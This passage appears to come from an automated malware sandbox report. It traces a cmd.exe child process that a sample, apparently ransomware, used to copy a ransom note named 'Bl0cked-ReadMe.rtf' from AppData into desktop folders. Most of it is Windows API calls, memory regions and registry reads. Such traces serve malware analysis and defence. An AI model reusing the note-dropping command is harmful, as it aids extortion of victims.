dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0136.464] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x30ea58 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0136.464] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x30ea3c, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x30ea3c*=0x1a) returned 1 [0136.465] _get_osfhandle (_FileHandle=1) returned 0x7 [0136.465] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0136.482] _get_osfhandle (_FileHandle=1) returned 0x7 [0136.482] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0136.483] _get_osfhandle (_FileHandle=0) returned 0x3 [0136.483] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0136.484] SetConsoleInputExeNameW () returned 0x1 [0136.484] GetConsoleOutputCP () returned 0x1b5 [0136.484] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0136.484] SetThreadUILanguage (LangId=0x0) returned 0x409 [0136.487] exit (_Code=0) Process: id = "142" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea166e0" os_pid = "0xc7c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T\\Bl0cked-ReadMe.rtf\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 13771 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 13772 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 13773 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 13774 start_va = 0x1f0000 end_va = 0x2effff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 13775 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 13776 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 13777 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 13778 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 13779 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 13780 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 14017 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 14018 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 14019 start_va = 0x60000 end_va = 0x6ffff entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 14020 start_va = 0xa0000 end_va = 0x19ffff entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 14021 start_va = 0x2f0000 end_va = 0x356fff entry_point = 0x2f0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 14022 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 14023 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 14024 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 14025 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 14026 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 14027 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 14028 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 14029 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 14030 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 14107 start_va = 0x360000 end_va = 0x427fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000360000" filename = "" Region: id = 14108 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 14109 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 14110 start_va = 0x50000 end_va = 0x56fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 14111 start_va = 0x70000 end_va = 0x71fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000070000" filename = "" Region: id = 14112 start_va = 0x80000 end_va = 0x80fff entry_point = 0x0 region_type = private name = "private_0x0000000000080000" filename = "" Region: id = 14113 start_va = 0x90000 end_va = 0x90fff entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 14114 start_va = 0x430000 end_va = 0x530fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000430000" filename = "" Region: id = 14115 start_va = 0x540000 end_va = 0x113ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 14116 start_va = 0x1140000 end_va = 0x12a2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001140000" filename = "" Thread: id = 199 os_tid = 0xc98 [0136.282] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2efc7c | out: lpSystemTimeAsFileTime=0x2efc7c*(dwLowDateTime=0x8b2a2240, dwHighDateTime=0x1d440a9)) [0136.282] GetCurrentProcessId () returned 0xc7c [0136.282] GetCurrentThreadId () returned 0xc98 [0136.282] GetTickCount () returned 0x2b144 [0136.282] QueryPerformanceCounter (in: lpPerformanceCount=0x2efc74 | out: lpPerformanceCount=0x2efc74*=19307120176) returned 1 [0136.283] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0136.283] __set_app_type (_Type=0x1) [0136.283] __p__fmode () returned 0x76b331f4 [0136.283] __p__commode () returned 0x76b331fc [0136.283] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0136.283] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0136.283] GetCurrentThreadId () returned 0xc98 [0136.283] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xc98) returned 0x38 [0136.283] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0136.283] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0136.283] SetThreadUILanguage (LangId=0x0) returned 0x409 [0136.322] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0136.323] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x2efc0c | out: phkResult=0x2efc0c*=0x0) returned 0x2 [0136.323] VirtualQuery (in: lpAddress=0x2efc43, lpBuffer=0x2efbdc, dwLength=0x1c | out: lpBuffer=0x2efbdc*(BaseAddress=0x2ef000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0136.323] VirtualQuery (in: lpAddress=0x1f0000, lpBuffer=0x2efbdc, dwLength=0x1c | out: lpBuffer=0x2efbdc*(BaseAddress=0x1f0000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0136.323] VirtualQuery (in: lpAddress=0x1f1000, lpBuffer=0x2efbdc, dwLength=0x1c | out: lpBuffer=0x2efbdc*(BaseAddress=0x1f1000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0136.323] VirtualQuery (in: lpAddress=0x1f3000, lpBuffer=0x2efbdc, dwLength=0x1c | out: lpBuffer=0x2efbdc*(BaseAddress=0x1f3000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0136.323] VirtualQuery (in: lpAddress=0x2f0000, lpBuffer=0x2efbdc, dwLength=0x1c | out: lpBuffer=0x2efbdc*(BaseAddress=0x2f0000, AllocationBase=0x2f0000, AllocationProtect=0x2, RegionSize=0x67000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0136.323] GetConsoleOutputCP () returned 0x1b5 [0136.326] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0136.326] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0136.326] _get_osfhandle (_FileHandle=1) returned 0x7 [0136.326] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0136.328] _get_osfhandle (_FileHandle=1) returned 0x7 [0136.328] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0136.329] _get_osfhandle (_FileHandle=1) returned 0x7 [0136.329] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0136.330] _get_osfhandle (_FileHandle=0) returned 0x3 [0136.330] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0136.332] _get_osfhandle (_FileHandle=0) returned 0x3 [0136.332] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0136.343] GetEnvironmentStringsW () returned 0xb01a8* [0136.344] FreeEnvironmentStringsW (penv=0xb01a8) returned 1 [0136.344] GetEnvironmentStringsW () returned 0xb01a8* [0136.344] FreeEnvironmentStringsW (penv=0xb01a8) returned 1 [0136.344] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2eeb7c | out: phkResult=0x2eeb7c*=0x40) returned 0x0 [0136.344] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2eeb84, lpData=0x2eeb88, lpcbData=0x2eeb80*=0x1000 | out: lpType=0x2eeb84*=0x0, lpData=0x2eeb88*=0xd0, lpcbData=0x2eeb80*=0x1000) returned 0x2 [0136.344] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2eeb84, lpData=0x2eeb88, lpcbData=0x2eeb80*=0x1000 | out: lpType=0x2eeb84*=0x4, lpData=0x2eeb88*=0x1, lpcbData=0x2eeb80*=0x4) returned 0x0 [0136.344] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2eeb84, lpData=0x2eeb88, lpcbData=0x2eeb80*=0x1000 | out: lpType=0x2eeb84*=0x0, lpData=0x2eeb88*=0x1, lpcbData=0x2eeb80*=0x1000) returned 0x2 [0136.344] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2eeb84, lpData=0x2eeb88, lpcbData=0x2eeb80*=0x1000 | out: lpType=0x2eeb84*=0x4, lpData=0x2eeb88*=0x0, lpcbData=0x2eeb80*=0x4) returned 0x0 [0136.344] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2eeb84, lpData=0x2eeb88, lpcbData=0x2eeb80*=0x1000 | out: lpType=0x2eeb84*=0x4, lpData=0x2eeb88*=0x40, lpcbData=0x2eeb80*=0x4) returned 0x0 [0136.344] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2eeb84, lpData=0x2eeb88, lpcbData=0x2eeb80*=0x1000 | out: lpType=0x2eeb84*=0x4, lpData=0x2eeb88*=0x40, lpcbData=0x2eeb80*=0x4) returned 0x0 [0136.344] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2eeb84, lpData=0x2eeb88, lpcbData=0x2eeb80*=0x1000 | out: lpType=0x2eeb84*=0x0, lpData=0x2eeb88*=0x40, lpcbData=0x2eeb80*=0x1000) returned 0x2 [0136.344] RegCloseKey (hKey=0x40) returned 0x0 [0136.344] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2eeb7c | out: phkResult=0x2eeb7c*=0x40) returned 0x0 [0136.344] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2eeb84, lpData=0x2eeb88, lpcbData=0x2eeb80*=0x1000 | out: lpType=0x2eeb84*=0x0, lpData=0x2eeb88*=0x40, lpcbData=0x2eeb80*=0x1000) returned 0x2 [0136.344] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2eeb84, lpData=0x2eeb88, lpcbData=0x2eeb80*=0x1000 | out: lpType=0x2eeb84*=0x4, lpData=0x2eeb88*=0x1, lpcbData=0x2eeb80*=0x4) returned 0x0 [0136.344] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2eeb84, lpData=0x2eeb88, lpcbData=0x2eeb80*=0x1000 | out: lpType=0x2eeb84*=0x0, lpData=0x2eeb88*=0x1, lpcbData=0x2eeb80*=0x1000) returned 0x2 [0136.344] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2eeb84, lpData=0x2eeb88, lpcbData=0x2eeb80*=0x1000 | out: lpType=0x2eeb84*=0x4, lpData=0x2eeb88*=0x0, lpcbData=0x2eeb80*=0x4) returned 0x0 [0136.345] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2eeb84, lpData=0x2eeb88, lpcbData=0x2eeb80*=0x1000 | out: lpType=0x2eeb84*=0x4, lpData=0x2eeb88*=0x9, lpcbData=0x2eeb80*=0x4) returned 0x0 [0136.345] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2eeb84, lpData=0x2eeb88, lpcbData=0x2eeb80*=0x1000 | out: lpType=0x2eeb84*=0x4, lpData=0x2eeb88*=0x9, lpcbData=0x2eeb80*=0x4) returned 0x0 [0136.345] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2eeb84, lpData=0x2eeb88, lpcbData=0x2eeb80*=0x1000 | out: lpType=0x2eeb84*=0x0, lpData=0x2eeb88*=0x9, lpcbData=0x2eeb80*=0x1000) returned 0x2 [0136.345] RegCloseKey (hKey=0x40) returned 0x0 [0136.345] time (in: timer=0x0 | out: timer=0x0) returned 0x5b88636a [0136.345] srand (_Seed=0x5b88636a) [0136.345] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T\\Bl0cked-ReadMe.rtf\"" [0136.345] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T\\Bl0cked-ReadMe.rtf\"" [0136.345] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0136.345] GetModuleFileNameW (in: hModule=0x0, lpFilename=0xb1908, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0136.345] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0136.345] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0136.346] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0136.346] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0136.346] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0136.346] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0136.346] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0136.346] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0136.346] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0136.346] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0136.346] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0136.346] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0136.346] GetEnvironmentStringsW () returned 0xb22f8* [0136.346] FreeEnvironmentStringsW (penv=0xb22f8) returned 1 [0136.346] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0136.346] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0136.346] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0136.346] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0136.346] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0136.346] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0136.346] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0136.346] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0136.346] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0136.346] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0136.346] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x2ef948 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0136.346] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x2ef948, lpFilePart=0x2ef944 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x2ef944*="Desktop") returned 0x18 [0136.347] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0136.347] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x2ef6c4 | out: lpFindFileData=0x2ef6c4) returned 0xb0038 [0136.347] FindClose (in: hFindFile=0xb0038 | out: hFindFile=0xb0038) returned 1 [0136.347] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x2ef6c4 | out: lpFindFileData=0x2ef6c4) returned 0xb0038 [0136.347] FindClose (in: hFindFile=0xb0038 | out: hFindFile=0xb0038) returned 1 [0136.347] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x2ef6c4 | out: lpFindFileData=0x2ef6c4) returned 0xb0038 [0136.347] FindClose (in: hFindFile=0xb0038 | out: hFindFile=0xb0038) returned 1 [0136.347] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0136.347] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0136.347] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0136.347] GetEnvironmentStringsW () returned 0xb2b18* [0136.348] FreeEnvironmentStringsW (penv=0xb2b18) returned 1 [0136.348] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0136.348] GetConsoleOutputCP () returned 0x1b5 [0136.369] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0136.369] GetUserDefaultLCID () returned 0x409 [0136.374] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0136.374] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x2efa88, cchData=128 | out: lpLCData="0") returned 2 [0136.374] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x2efa88, cchData=128 | out: lpLCData="0") returned 2 [0136.374] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x2efa88, cchData=128 | out: lpLCData="1") returned 2 [0136.374] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0136.374] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0136.375] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0136.375] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0136.375] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0136.375] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0136.375] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0136.375] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0136.375] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0136.375] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0136.375] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0136.376] GetConsoleTitleW (in: lpConsoleTitle=0xa08f8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0136.391] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0136.391] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0136.391] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0136.391] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0136.392] _wcsicmp (_String1="type", _String2=")") returned 75 [0136.392] _wcsicmp (_String1="FOR", _String2="type") returned -14 [0136.392] _wcsicmp (_String1="FOR/?", _String2="type") returned -14 [0136.392] _wcsicmp (_String1="IF", _String2="type") returned -11 [0136.392] _wcsicmp (_String1="IF/?", _String2="type") returned -11 [0136.392] _wcsicmp (_String1="REM", _String2="type") returned -2 [0136.392] _wcsicmp (_String1="REM/?", _String2="type") returned -2 [0136.396] _get_osfhandle (_FileHandle=1) returned 0x7 [0136.396] _get_osfhandle (_FileHandle=1) returned 0x7 [0136.396] _get_osfhandle (_FileHandle=1) returned 0x7 [0136.396] GetFileType (hFile=0x7) returned 0x2 [0136.461] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0136.461] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2ef980 | out: lpMode=0x2ef980) returned 1 [0136.462] _dup (_FileHandle=1) returned 3 [0136.463] _close (_FileHandle=1) returned 0 [0136.465] _wcsicmp (_String1="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T\\Bl0cked-ReadMe.rtf", _String2="con") returned -53 [0136.465] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\desktop\\lp6y\\hqvibu00\\u7e2t\\bl0cked-readme.rtf"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x2ef950, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4c [0136.466] _open_osfhandle (_OSFileHandle=0x4c, _Flags=8) returned 1 [0136.467] GetConsoleTitleW (in: lpConsoleTitle=0x2ef780, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0136.467] _wcsicmp (_String1="type", _String2="DIR") returned 16 [0136.467] _wcsicmp (_String1="type", _String2="ERASE") returned 15 [0136.467] _wcsicmp (_String1="type", _String2="DEL") returned 16 [0136.467] _wcsicmp (_String1="type", _String2="TYPE") returned 0 [0136.468] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0136.468] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF", fInfoLevelId=0x1, lpFindFileData=0x2ef2e4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2ef2e4) returned 0xa0ea0 [0136.468] _wcsicmp 